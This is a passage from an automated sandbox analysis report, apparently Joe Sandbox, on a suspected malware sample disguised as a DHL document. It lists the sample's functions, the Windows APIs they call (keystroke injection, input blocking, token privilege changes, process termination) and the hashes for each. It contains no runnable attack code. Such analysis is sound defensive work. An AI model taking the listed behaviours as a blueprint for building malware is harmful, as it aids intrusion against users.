TerminateProcess.KERNEL32(00000000,?,00414CBE,004228E9,004B88B8,0000000C,00414E15,004228E9,00000002,00000000,?,004228E9), ref: 00414D10
ExitProcess.KERNEL32 ref: 00414D22

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5d96ef67b9d71852ff6882b3d65b39ccafd685b7f3dc23fa5f611618997fcf9f
Instruction ID: 487eb974f610ee8be72e0f53e71575d54e2d179270d4add0611e32685d7e8990
Opcode Fuzzy Hash: 5d96ef67b9d71852ff6882b3d65b39ccafd685b7f3dc23fa5f611618997fcf9f
Instruction Fuzzy Hash: B2E0B631400148ABCF21AF55ED49A993B69FB81B85B104429FC098A222CB39DD82DB98

Function 0042C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0042C36C

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: a38b39c88310b1755a4d7c912ee2c04636b33b355f35a7c5b2bcb7aec467ecff
Instruction ID: 02f359d86d4a1b39e9d70f5f6b990dd57fb1620692e00f01314996b7a175450f
Opcode Fuzzy Hash: a38b39c88310b1755a4d7c912ee2c04636b33b355f35a7c5b2bcb7aec467ecff
Instruction Fuzzy Hash: AF413D71A00228ABCB20DFB9DC88EAF7778EB84354F5045AEF905C7280E6749D418B58

Function 0044D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0044D28C

Strings

X64, xrefs: 0044D2A8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 2f6696e813440278c15d3f7aed77439501eb84c5c84b623e299cddd2f0e9b942
Instruction ID: 84a25008eb27f6c5df07bc9252893a5e93eb98e6da9c457274aaed0503d3737b
Opcode Fuzzy Hash: 2f6696e813440278c15d3f7aed77439501eb84c5c84b623e299cddd2f0e9b942
Instruction Fuzzy Hash: 65D0C9B480111DEBCB90CBD0DCC8DDDB37CBB04345F1005A6F106A2140D77495498F24

Function 0041CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: c3c46fca687729c422bfa7242ffd74ed80dd7b6f335d34bf52ac463b181fce00
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: D4022C71E402199BDF14CFA9D9806EEFBF1EF48314F25816AD819E7384D734AE418B88

Function 003FCAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#L, xrefs: 003FCF7F
Variable is not of type 'Object'., xrefs: 00440C40

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#L
API String ID: 0-783923862
Opcode ID: 149816cd02af9c7af282bdd7c9a2cc3f2ea5ba78c22ce3d983499e044e78ba91
Instruction ID: 2bece344a6e175e998d5b8adc878964ff5bd3a191a3795c9c3fc1081dbd9cb7b
Opcode Fuzzy Hash: 149816cd02af9c7af282bdd7c9a2cc3f2ea5ba78c22ce3d983499e044e78ba91
Instruction Fuzzy Hash: F932AF7095021CDBDF15DF90CA81BFEB7B9BF04304F20406AEA06AB292D779AD46CB54

Function 004668EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00466918
FindClose.KERNEL32(00000000), ref: 00466961

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 76faa1631f5fe8667c6b7db0af5ea6dce4e8877addd7223e5774c096c5d2bcd6
Instruction ID: 30d7fa737e54a4703d95f08e5b94e6d3c406f1b03438e1b1e3bb3f9a560de71a
Opcode Fuzzy Hash: 76faa1631f5fe8667c6b7db0af5ea6dce4e8877addd7223e5774c096c5d2bcd6
Instruction Fuzzy Hash: E111D3716042059FC710DF29C484A26BBE5FF85328F05C6ADE8698F3A2D734EC05CB91

Function 004637B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00474891,?,?,00000035,?), ref: 004637E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00474891,?,?,00000035,?), ref: 004637F4

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: da90a520f9ad74ecba31047497c0e5e6b3781f7a5234f9b54350d404dad9b6fe
Instruction ID: 54fb8357f0f558eb79377d696b2ff75b333a5f76d995c86e815e646f9e5fbd00
Opcode Fuzzy Hash: da90a520f9ad74ecba31047497c0e5e6b3781f7a5234f9b54350d404dad9b6fe
Instruction Fuzzy Hash: 53F0E5B06042282AE7201B769C8DFEB7AAEEFC4762F00017AF509D2291D9709904C7B9

Function 0045B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0045B25D
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 0045B270

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 733505f948a6ef6ab4d61ae09ab7081b24a8e0d2247fecdc57a7190df3f9d496
Instruction ID: eea58bebce05c6b7f0b544c5c95dafef81a446692f75237191dd1cea8f35761c
Opcode Fuzzy Hash: 733505f948a6ef6ab4d61ae09ab7081b24a8e0d2247fecdc57a7190df3f9d496
Instruction Fuzzy Hash: BDF01D7180424EABDF059FA0C805BAE7BB4FF04305F00845AFD55A5192C7798615DFA8

Function 004510BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004511FC), ref: 004510D4
CloseHandle.KERNEL32(?,?,004511FC), ref: 004510E9

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: d6e0eec6d8b9b48cef6bd1951a8175fe1fd0c4347b896425558c970315eeb0ca
Instruction ID: a305cfd632bad06d6e2a4eb0c320cef69d77cbacad0e281f3a47fd41ffa974cc
Opcode Fuzzy Hash: d6e0eec6d8b9b48cef6bd1951a8175fe1fd0c4347b896425558c970315eeb0ca
Instruction Fuzzy Hash: D1E04F32014600AEE7252B61FC05E7777A9EF04310B20883EF8A6808F1DB72AC90DB68

Function 0042676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00426766,?,?,00000008,?,?,0042FEFE,00000000), ref: 00426998

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0f6f8cf373c19db0cafb6da353ac90a78e8c77fcbebe12856703fcf8b749d963
Instruction ID: 746b2d5111b98ae883941f8475ca6b1203ad81cda077d2f194318e45adae05e2
Opcode Fuzzy Hash: 0f6f8cf373c19db0cafb6da353ac90a78e8c77fcbebe12856703fcf8b749d963
Instruction Fuzzy Hash: C2B1AD71610618CFD718CF28D486B657BE0FF05364F668699E899CF3A2C739E982CB44

Function 0040B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0044851F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ec12253f35108dfc8b7c36dbbf81e4fc54848952f7b9b31622f4923994ca1e3b
Instruction ID: 6900085956b6b060cf910e56fecef7413762fdd863792c1117bd9e11243611df
Opcode Fuzzy Hash: ec12253f35108dfc8b7c36dbbf81e4fc54848952f7b9b31622f4923994ca1e3b
Instruction Fuzzy Hash: F61242719002199BDB14CF58C8806EEB7F5FF48710F1481ABE849EB295DB789E81CF99

Function 0046EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0046EABD

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 67f65f8e4f2ae6092181d0ab90d5e86b7032dab5ea70b23324de38f68d0d799f
Instruction ID: f7448c00f591368967fa317901a400fa501513d41d87bca657aa42b758c0b722
Opcode Fuzzy Hash: 67f65f8e4f2ae6092181d0ab90d5e86b7032dab5ea70b23324de38f68d0d799f
Instruction Fuzzy Hash: C9E04F352102089FC710EF9AD844E9AF7E9AF98760F00842AFD49DB351EB74E8418BA5

Function 004109D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,004103EE), ref: 004109DA

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2829c6c2da43ce3b0c37f184dce7867ac60f53a594c3e9ab2dc7e71e26d4a827
Instruction ID: d0e709aa8d2f641bdb2537f7696b844225fea61a054d38b9bca8d8a97f40bdcd
Opcode Fuzzy Hash: 2829c6c2da43ce3b0c37f184dce7867ac60f53a594c3e9ab2dc7e71e26d4a827
Instruction Fuzzy Hash:

Function 0041781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0041798B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: af2484a871b91ec5c9b2172b16a3bac44c10e883e7efb707e17a36b6b99b472e
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 01516AB165C60557EB38666988997FF27B59B02344F18090FE882C7382C61DDECAD35E

Function 00462046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&L, xrefs: 00462053

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID: 0&L
API String ID: 0-1738453533
Opcode ID: c9763597a9d4fab0522711f4ab896f7c80205ee2265d7e1f6598d4d697b82976
Instruction ID: 163846ebe3c7294f2d0536d1a4df63b8126fd7abb813d6662081484aa4982b7c
Opcode Fuzzy Hash: c9763597a9d4fab0522711f4ab896f7c80205ee2265d7e1f6598d4d697b82976
Instruction Fuzzy Hash: 5221E7323206158BD728CF79C92367E73E5A754310F14862EE4A7C33D0DEB9A904CB94

Function 00426DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d665869f12da928c5a48bb69c834377d7ea66cc8a8204ba29c3fd44c0db6c8b4
Instruction ID: f65c9a0f7c73471ed7c427717fcf50ea9a24a6d4aada53c796c0f181cf5fa4a6
Opcode Fuzzy Hash: d665869f12da928c5a48bb69c834377d7ea66cc8a8204ba29c3fd44c0db6c8b4
Instruction Fuzzy Hash: B9324521E29F114DDB239634ED62336A249AFB73C5F55C737E81AB5EA5EB28C4C34108

Function 0040CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5facdbc1b4d5ea5e33aa7b16c278d43fc266560ff58b3fb69aac2364d90916f2
Instruction ID: 6488bcc90f676bb7a18e3b6c882739e2df68c0c7f5433acf38fc374131aafc9c
Opcode Fuzzy Hash: 5facdbc1b4d5ea5e33aa7b16c278d43fc266560ff58b3fb69aac2364d90916f2
Instruction Fuzzy Hash: C9320131A051458BFF68CF29C4D067E77A1EB45304F2C863BD44AAB392D63C9D82DB49

Function 003F7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40533fe086e18d9ce3f45f71e4977ac54a40383ea0660f63f73fa252484a272
Instruction ID: 36c2fe1ccc01e745cd47552d766217a6de674235299278c137e258a6ac812a49
Opcode Fuzzy Hash: a40533fe086e18d9ce3f45f71e4977ac54a40383ea0660f63f73fa252484a272
Instruction Fuzzy Hash: 4222B170A04609DFDF14CFA5C941ABEB7F6FF48300F10452AE816AB291EB39AD55CB54

Function 003F91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfc345d5023e05bef8f8ad7ccf646c0fdf3cdcf0f3ca8b14a2e8546921097155
Instruction ID: 495c5d09cdbe17819c077e14559fa4df16211b11b08d34a410291882e56bb63d
Opcode Fuzzy Hash: dfc345d5023e05bef8f8ad7ccf646c0fdf3cdcf0f3ca8b14a2e8546921097155
Instruction Fuzzy Hash: B902D6B0A00209EBCB05DF55D881BAEB7B5FF48304F10816AE9069B3D1EB35AE55CB85

Function 00411C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 2bf4347a0ce3ed05ff47213f7f485f5427eb1f77f23ead914033aa23a1e90ea2
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 1591A9722080A349DB29437D95340BFFFE15A523A131A079FD5F2CB2E1FE18D595D624

Function 004119B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 1ad9737a72e915d4ff449c5d7c299011eace6eec74750db6e1efab8a2e88f11f
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
